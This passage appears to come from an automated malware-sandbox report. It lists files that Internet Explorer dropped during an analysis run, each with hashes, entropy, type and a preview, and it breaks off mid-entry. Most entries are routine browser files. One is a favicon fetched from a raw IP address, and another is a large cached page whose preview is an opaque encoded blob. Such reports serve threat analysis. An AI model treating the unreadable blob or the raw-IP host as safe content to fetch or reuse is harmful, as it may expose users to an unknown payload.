                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A8EB16E5-2F7E-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:Microsoft Word Document
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):27372
                                                                                                                                        Entropy (8bit):1.8460772593518162
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:r7ZEQO64kjcFjt2wkWYMnY+X0I3jxX0I3oaWA:rNNZFjchk09nTX0aX0faB
                                                                                                                                        MD5:F87A8BC6E7CF04DD81D0480B1A69060E
                                                                                                                                        SHA1:2343288C86A88623554F1FD581E207C9EE96D9B3
                                                                                                                                        SHA-256:CE5F9CA382065E3191FA41C22BE0BE29954435DD859755DD9D3A783B5CC8E01A
                                                                                                                                        SHA-512:B84FFDDE370A7C3F86F368C0544BC7EDC6491E8F86E8D73579C59E0F6F3CEC8EADDF5F4118E209F1A775D4F634BCDBE48EA80046D7FCAA35ED1C932902B7C3A7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A8EB16E7-2F7E-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:Microsoft Word Document
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):27364
                                                                                                                                        Entropy (8bit):1.8438124492675048
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:rPZsQf6VBSsFjx2YkWjMiYGS12RS1x1H+A:rPZsQf6VksFjx2YkWjMiYGSoRS79+A
                                                                                                                                        MD5:90E2EA2640CB6D975909CD0E120B4804
                                                                                                                                        SHA1:51946371537A284A8C3416EF1F36135CFF9A9A3B
                                                                                                                                        SHA-256:46316EF1DEC01E8B55DE6FF4C8A436433B03DE23D8F0BC5A05C0E42C50B11CE8
                                                                                                                                        SHA-512:ED3AB0837939C92B365F950B7E02F0EE6007A4CB5E8C05E7CEAA8402C43BD489A0BA55D3C23313C4A93D0BCAB73E7CF1E897857C62A3E6484F4A18CE6812E8CB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):656
                                                                                                                                        Entropy (8bit):5.110815642686243
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TMHdNMNxOEDjOjAnWimI002EtM3MHdNMNxOEDjOjAnWimI00OYGVbkEtMb:2d6NxOOIASZHKd6NxOOIASZ7YLb
                                                                                                                                        MD5:504BE96DF70C4859EAE49FC0DCDCCB8A
                                                                                                                                        SHA1:7D82FA19B7CF7D06CEC29E3C02AA2D2C36DED407
                                                                                                                                        SHA-256:16CBA7FD099345CF713A0EF446CAF612020F7734F58E17A496B54E9A903F3EF1
                                                                                                                                        SHA-512:D74B4C653C631DA55D44A027433DD4BF084FA4392E4D5685E2BF1C31D135456E76A81C91EEE8D40A4CF3590B238502252F642C736290BBD922B4441CD205B4F9
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x649a9fe8,0x01d6c38b</date><accdate>0x649a9fe8,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x649a9fe8,0x01d6c38b</date><accdate>0x649a9fe8,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):653
                                                                                                                                        Entropy (8bit):5.149999812576829
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TMHdNMNxe2kH8AnWimI002EtM3MHdNMNxe2kH8AnWimI00OYGkak6EtMb:2d6Nxrq8ASZHKd6Nxrq8ASZ7Yza7b
                                                                                                                                        MD5:EFE080215C5821BD5FDF487F0890D9C8
                                                                                                                                        SHA1:B9B44E5613168DD576B5286FA70253110BBC4EF9
                                                                                                                                        SHA-256:3F7F2D62FA98CE46A26C7CC2CCF39EFC8CC65CB4EE864E6507FEA6ADF139DB92
                                                                                                                                        SHA-512:1FEE29C4F808A980540B095B6B25C07368B937326F68FCF8D6C2AC4044D2AFCF779A3EFDBD669BD919B01B12836F25FBB6A37326E13C83B88946736A556A70AB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x6495daf9,0x01d6c38b</date><accdate>0x6495daf9,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x6495daf9,0x01d6c38b</date><accdate>0x6495daf9,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):662
                                                                                                                                        Entropy (8bit):5.139538174070266
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TMHdNMNxvLDjOjAnWimI002EtM3MHdNMNxvLDjboRAnWimI00OYGmZEtMb:2d6NxvzIASZHKd6NxvzbqASZ7Yjb
                                                                                                                                        MD5:E99CF2B8ADBDF3A8C895B86B80E06C74
                                                                                                                                        SHA1:CCC6ED6892E33E35965B592C7927451D0BC5CA58
                                                                                                                                        SHA-256:5D51C3B36AA7AAB0DF19E3E533CF449D0437A872467F5B070605828A125BB4A6
                                                                                                                                        SHA-512:14406BE5A85E074263EE2FB26A74183BB60FB29C90ABC8E325FD7973F6A31B6D1FF3A2DF39F37DBC3FEE25E4D7ADE64761ED0FDFB2E63610B90828378E47385C
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x649a9fe8,0x01d6c38b</date><accdate>0x649a9fe8,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x649a9fe8,0x01d6c38b</date><accdate>0x649d0236,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):647
                                                                                                                                        Entropy (8bit):5.142909586785913
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TMHdNMNxilERSERAnWimI002EtM3MHdNMNxilERSERAnWimI00OYGd5EtMb:2d6NxuGSGASZHKd6NxuGSGASZ7YEjb
                                                                                                                                        MD5:6B063EDA5B544269E8618D85CF165C78
                                                                                                                                        SHA1:0473D7AAC2CAA2FE2C1583612F6E276580797470
                                                                                                                                        SHA-256:A503CD754288A31B547FC4F1AE10D7FDC2DE4AB7931CCC3C903237916625B468
                                                                                                                                        SHA-512:057895E5F66ACB8C3D84052976C76F8E8721C62C3BEE9EC9488DBAB26C2D79F8D3A5935C2CA13DF9B054FCFE4F84117F524D864F9AEB453572C3FBA0CAF911D4
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x64983d96,0x01d6c38b</date><accdate>0x64983d96,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x64983d96,0x01d6c38b</date><accdate>0x64983d96,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):656
                                                                                                                                        Entropy (8bit):5.1587159293859886
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TMHdNMNxhGwUoRboRAnWimI002EtM3MHdNMNxhGwUoRboRAnWimI00OYG8K075Es:2d6NxQdqbqASZHKd6NxQdqbqASZ7YrKG
                                                                                                                                        MD5:34947F7E7EE6DF59B8F85977EACE5C95
                                                                                                                                        SHA1:14E96A5ECFB423F0E61D9E7CED8B6DA2B7D36CF9
                                                                                                                                        SHA-256:69DFE958AF2FD3AAA46D544E5195F5FA94B8C933BA91AE8CCFFA58C9DA141D1F
                                                                                                                                        SHA-512:615048CF8FE0CB1ABBCF2B843C0AADAA0E3780A3545BC27D19A8D7739B68B21D722E8155AAD842128B517B6191C149E3536B9105C8F5496626803D47F78D4D6D
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x649d0236,0x01d6c38b</date><accdate>0x649d0236,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x649d0236,0x01d6c38b</date><accdate>0x649d0236,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):653
                                                                                                                                        Entropy (8bit):5.114655449019595
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TMHdNMNx0nDjOjAnWimI002EtM3MHdNMNx0nDjOjAnWimI00OYGxEtMb:2d6Nx0PIASZHKd6Nx0PIASZ7Ygb
                                                                                                                                        MD5:A76CB355A6478812041BE9992418BAAC
                                                                                                                                        SHA1:84E1146551C1A697ECBB0624957CFDFB7FC8C565
                                                                                                                                        SHA-256:4DAB19169B916D8A995381E693E61CCB3EB4BCB65A1C3CB82217BB4D960497D8
                                                                                                                                        SHA-512:00618D05EB7486B919C99FA02C26146C867730DED051DF95E9CFA0A8524B1D4FED5D4720AA890892721603665ECA02F87141B6849871D3725B636CF66DED03B4
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x649a9fe8,0x01d6c38b</date><accdate>0x649a9fe8,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x649a9fe8,0x01d6c38b</date><accdate>0x649a9fe8,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):656
                                                                                                                                        Entropy (8bit):5.150450922014039
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TMHdNMNxxDjOjAnWimI002EtM3MHdNMNxxDjOjAnWimI00OYG6Kq5EtMb:2d6NxJIASZHKd6NxJIASZ7Yhb
                                                                                                                                        MD5:1B21BCFC4BEB3FC32DC4B0A5D83113CF
                                                                                                                                        SHA1:9EEB9A246087171417E99B3F9E5567E23833B253
                                                                                                                                        SHA-256:1C5EFFAE980B8C9D2FF82037304D68D3305712ECF095392577FD3C84D9F67210
                                                                                                                                        SHA-512:30D692C123643EB2B7CFFDC3F0EB10ADEC316A738E4BCE4062DD66F603D30D76AF30E886E8114D73C5B1C7C48771D03B7853CCD7418697C9711AC0602FBA1FAE
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x649a9fe8,0x01d6c38b</date><accdate>0x649a9fe8,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x649a9fe8,0x01d6c38b</date><accdate>0x649a9fe8,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):659
                                                                                                                                        Entropy (8bit):5.143574379000489
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TMHdNMNxclERSERAnWimI002EtM3MHdNMNxclERSERAnWimI00OYGVEtMb:2d6NxcGSGASZHKd6NxcGSGASZ7Ykb
                                                                                                                                        MD5:A264E8261581266A559E57A8807D1801
                                                                                                                                        SHA1:D39F1A8E033D0B89D5F241E54D8E833814B5D0BA
                                                                                                                                        SHA-256:C367C8BE906F9985FBA726ADC6F569529F744A3E7579CC51F224BCC565D30247
                                                                                                                                        SHA-512:2D3D77F45A2BECEFD6BDEDC5DF4D5A53F3E4C9EC43CD5E4AEA6DC2E6496DF73BEA3A5820FBE93C697DF229F0B889876DCA5A7239F5EF4D1C6BBF7F3F832FA466
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x64983d96,0x01d6c38b</date><accdate>0x64983d96,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x64983d96,0x01d6c38b</date><accdate>0x64983d96,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):653
                                                                                                                                        Entropy (8bit):5.1279448318400265
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TMHdNMNxfnlERSERAnWimI002EtM3MHdNMNxfnlERSERAnWimI00OYGe5EtMb:2d6NxdGSGASZHKd6NxdGSGASZ7YLjb
                                                                                                                                        MD5:EA2C83646D5686E8698B4A4157DA8A95
                                                                                                                                        SHA1:76952E054648D88C511B2F2E6738E3C1AB282D4C
                                                                                                                                        SHA-256:2D59EDB5EC0DC41AEB79EE0ECDB83BCA12E7A3AB8883AB6F41E3C17F6E734F96
                                                                                                                                        SHA-512:BFE5FA64927857722712F2B1CFF4056CB1D0D7E6EB6EF1CB9C0B5F165EE88A1A96DF643EF8542110EEA21B4844E7A01FCDB23E7AB860953EDE7206B8B4A2D3D0
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x64983d96,0x01d6c38b</date><accdate>0x64983d96,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x64983d96,0x01d6c38b</date><accdate>0x64983d96,0x01d6c38b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\gee00pr\imagestore.dat
                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):5652
                                                                                                                                        Entropy (8bit):4.128806584567347
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:A0aWBUm5zDlvV2rkG4zuAZMXJFG62q7mQ7:ACBN5zZ0IG46AaXJFG6v7me
                                                                                                                                        MD5:7CB0B0AB6E8AB6E5FCA32C18F0C28B72
                                                                                                                                        SHA1:549802D1FEE79EDDB246E676BC6C692F7D68E120
                                                                                                                                        SHA-256:A559C47165BC67FC87B4A9A27132E670B3F9FA38D19472CEF36F84F3DB645B29
                                                                                                                                        SHA-512:F5AB678FA4ADB362C4849233707864A1ADD4A859C202340D22C182B3DD606DB609230C60EEB1B3F73B2C89AB63BF96D8611370B2C13B7B0FD947F7A26A0887C5
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ........!.h.t.t.p.:././.1.8.5...2.1.2...4.7...2.2.3./.f.a.v.i.c.o.n...i.c.o.~............... .h.......(....... ..... .....@.....................s...s...s...sw..r.......s...s...s...s.......s...s..s...s...s...s...r...s{..s...s#..s...s..r..s..s...s[..s...s...s..s...s...s...s}..s...sW..r..s...sm..sK..sC..sw..s..s...s%..s!..s..s...s...s...sU..s.sY..s...s..s..r#......s...s...s..s...r%..s[..s...s...s..s]..s...r.sS..s...sq..........s...s...s...s...s.......su..s...s.......s...s..s.sA..............s%..s..s#......r...r...s]..........s...s..sk..s...s...........s...s...s]......s...r..s7..........s...s..r...r...s...r...........s...s.......s...s..s7..........s...s..si..s?..s7..s...........s...s.......s...s...rW..........s...s..s...s...s...s...........s...s[..........ss..s...s.......s...s..sm..sI..s;..s.......s!..s..s#......s...s...s..sQ......s...s..s...r...sm..s...r...s...r...s...s...r...s...sQ..s..rK..s...sg..s'..........s...s...s..s...s'..s_..s...s...s...rQ..s..s...
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\dnserror[1]
                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):2997
                                                                                                                                        Entropy (8bit):4.4885437940628465
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                                                                                                        MD5:2DC61EB461DA1436F5D22BCE51425660
                                                                                                                                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                                                                                                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                                                                                                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\down[1]
                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                        File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):748
                                                                                                                                        Entropy (8bit):7.249606135668305
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                        MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                        SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                        SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                        SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\FhJZ[1].htm
                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):294336
                                                                                                                                        Entropy (8bit):5.999874303664228
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6144:gJgvKKWXQlvYBYLFJSu004WIE1y+GbafKREXifd+39gqVw2qt:3vrWXa34WFGbaCRgifd+aqVhQ
                                                                                                                                        MD5:501A880E10CF735C96413C6C5DBC9C89
                                                                                                                                        SHA1:677F92E5D082A7792AF30681C626AE4A920AA67B
                                                                                                                                        SHA-256:FF1B592DE544D3DED49060D18CB006359C161158A291D0F9E4C0A52D4A1B2BDD
                                                                                                                                        SHA-512:1F4BD39B2308116EC539FF3FDEEC62A2C1C3301B9344D863B076211360170E557F923CBCE6106439CDDEC70157669AD1D53D56AE89587B2AA0068C785B95CE7C
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: grWALJ0AoRryMhLkb4+5fKF1BT3DlVu3juzEHaw/ZvSESmQvXQ8nkp0Y9RkdWgizqtOP/q9o5sWT/Z8RkFFgKjmVdePfv8wGx6TOupHz1tiC0WeZO+Tg8kFvlMQoQ+W5C/gUbP7HrT4E4mUKQKLJ2UY2ud7eKeRK6mLxJqA4PJiVaeeZ+yi0MF9o0ZM2WhLqirzGPjUI9bTPEfm9z0/gUwDHlKGNc6iybmpKo6nZXwnWBxahvOjyTRD1RXw4CS0qd6CSb6azJiruXpUkfHVo70MZyilCOxiqt9mfZIZ/zlezhnYEeRX+Vecs5qDBeYdxmZZtuvbwOtYuutKfR53fM+HbhOqF6CkdcLAQo6tsN9TSxKeAeZ3DsTTuc1MoCf+cwspwskaOKP/7Y7JX77hVVBQidkHGsb+EB17pGK5RvMRzTWlYWZUABvBnPNj4HVN2s6mYq4kGeCn0HCIhM/LT/Pj+oskbvvRKCFSGbPbaFTiQhUQiyQk+7XlIEHyDwM80PepbUo/nzxHnFClyJBhnCa3uD/airlZI8IdnnlDMj9WoAScFDZiU8hO6T2R0UnLKuPo1pr2Q44rDzPkPjvK334PGyOZwYS3UzX7LJVUbNkzuSJiGivmiqs8ofvZuBTaX+WDuPsyRj0118A62wDwavpDJZalqG+VFHFfEPA4y6vrQ3f7+CkUxfmkfuPVJJ6oZVy+q952He+1WXlXRWz4/jvW14i1raDa5KxCPaKR3NKV30oPj3jHwSrHixnf3wtqyVxw2aWibNxqhxKXzn98bOAoepV3gryP0NeD8tqCf8aErhfTyT/bgXWqhSq5rkTCwAXZGhEb4BkQOB1Izvn1EwwQnOcu3x+AKtlyoBRSIYOhCjIDGfXe1DL82RW/a0dY1XPNExp1QCwcLg8P82aHwplOuYpTdj0huolfr2kT0Hzv88q9cIrV7+TfcN5Z2FPINPue2PMYJ2HQ/QlMxwnvaeTptU73Tup2rYkC1HbAj
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\errorPageStrings[1]
                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4720
                                                                                                                                        Entropy (8bit):5.164796203267696
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                        MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                        SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                        SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                        SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\uVs[1].htm
                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
